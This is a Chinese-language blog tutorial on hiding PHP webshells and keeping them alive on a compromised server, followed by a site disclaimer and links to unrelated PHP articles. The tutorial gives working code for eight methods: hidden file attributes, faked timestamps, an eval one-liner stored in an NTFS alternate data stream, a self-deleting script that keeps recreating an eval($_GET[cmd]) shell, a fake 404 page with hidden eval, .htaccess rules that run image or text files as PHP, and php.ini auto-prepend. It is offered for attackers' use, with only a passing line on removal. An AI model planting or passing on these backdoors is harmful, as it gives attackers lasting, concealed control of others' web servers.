PHP怎么添加隐藏后门？很多PHP初学者可能对于PHP后门隐藏不是很清楚，因此，这篇文章就给大家分享一些PHP隐藏后门的方法，下面是具体的用法级示例，有需要的朋友一起的来学习一下吧。

       如果想让自己的Webshell留的更久一些，除了Webshell要免杀，还需要注意一些隐藏技巧，比如隐藏文件，修改时间属性，隐藏文件内容等。

1、隐藏文件

       使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。

attrib +s +a +h +r shell.php //隐藏shell.php文件

2、修改文件时间属性

       当你试图在一堆文件中隐藏自己新创建的文件，那么，除了创建一个迷惑性的文件名，还需要修改文件的修改日期。

//修改时间修改
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//访问时间修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//创建时间修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12" 

       使用命令获取文件属性

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force 

       修改某个文件夹下所有文件的创建和修改时间

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、利用ADS隐藏文件内容

       在服务器上echo一个数据流文件进去，比如index.php是网页正常文件，我们可以这样子搞：

echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg 

       这样子就生成了一个不可见的shell hidden.jpg，常规的文件管理器、type命令，dir命令、del命令发现都找不出那个hidden.jpg的。

       利用include函数，将index.php:hidden.jpg进行hex编码，把这个ADS文件include进去，这样子就可以正常解析我们的一句话了。

<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

4、不死马

       不死马会删除自身，以进程的形式循环创建隐蔽的后门。

<?php
set_time_limit(0); 
ignore_user_abort(1); 
unlink(__FILE__); //删除自身
while(1)
{ 
 file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //创建shell.php，这里最好用免杀的一句话
 sleep(10); //间隔时间
}
?> 

       处理方式最简单有效的办法，就是重启服务就可以删除webshell文件。

5、中间件后门

       将编译好的so文件复制到modules文件夹，启动后门模块，重启Apache。当发送特定参数的字符串过去时，即可触发后门。

6、利用404页面隐藏后门

       404页面主要用来提升用户体验，可用来隐藏后门文件。

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

7、利用 .htaccess 文件构成PHP后门

       一般.htaccess可以用来留后门和针对黑名单绕过，在上传目录创建.htaccess 文件写入，无需重启即可生效，上传png文件解析。

AddType application/x-httpd-php .png 

       另外，在.htaccess 加入php解析规则，把文件名包含1的解析成php，上传1.txt即可解析。

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

8、利用 php.ini 隐藏后门文件

       php.ini 中可以指定在主文件执行前后自动解析的文件名称，常用于页面公共头部和尾部，也可以用来隐藏php后门。

；在PHP文档之前自动添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文档之后自动添加文件。
auto_prepend_file = "c:\tmp.txt"

       需重启服务生效，访问任意一个php文件即可获取webshell。

总结

       以上就是关于php怎么添加隐藏后门的介绍，本文介绍了八个方法，希望对大家学习有帮助，更多PHP内容大家可以继续关注其他文章。

免责声明：本站发布的内容（图片、视频和文字）以原创、转载和分享为主，文章观点不代表本网站立场，如果涉及侵权请联系站长邮箱：mmqy2019@163.com进行举报，并提供相关证据，查实之后，将立刻删除涉嫌侵权内容。

猜你喜欢

• PHP7匿名类的使用是怎样的，有什么好处

  在PHP7之后，PHP中加入了匿名类的特性。匿名类和匿名方法让PHP成为了更现代化的语言，也让我们的代码开发工作越来越方便。下面本篇文章就来简单带大家了解一下PHP7 匿名类的用法，希望对大家有所帮助！

• PHP中for循环的语法是什么，怎样对数组进行遍历

  for(PHP4,PHP5)for 循环是PHP中最复杂的循环结构。它的行为和C语言的相似。 for 循环的语法是：for(expr1;expr2;expr3)statement 第一个...

• 如何理解PHP面向对象中类的定义是什么

  php面向对象中类的定义：1、使用class 这个关键字定义类，类的名称就跟函数名称一样可以设置；2、将类进行实例化，获得实例对象；3、为对象设置值，并需要添加一些方法。

• PHP的array_product函数功能是什么， 怎样用

  php数组中array_product函数的使用：1、函数功能是计算数组中所有值的乘积，在累乘数组中所有成员的时候会将成员的值转为数值类型。2、在计算过程中将数组成员转为数值类型进行计算，需要确保了解数组成员转为数值类型后的值。

• PHP Math函数有何作用，怎样使用？

  通过 Math 函数能够处理 PHP 中的值，Math 函数包含许多用于计算的数学函数，本节将一一为你讲解！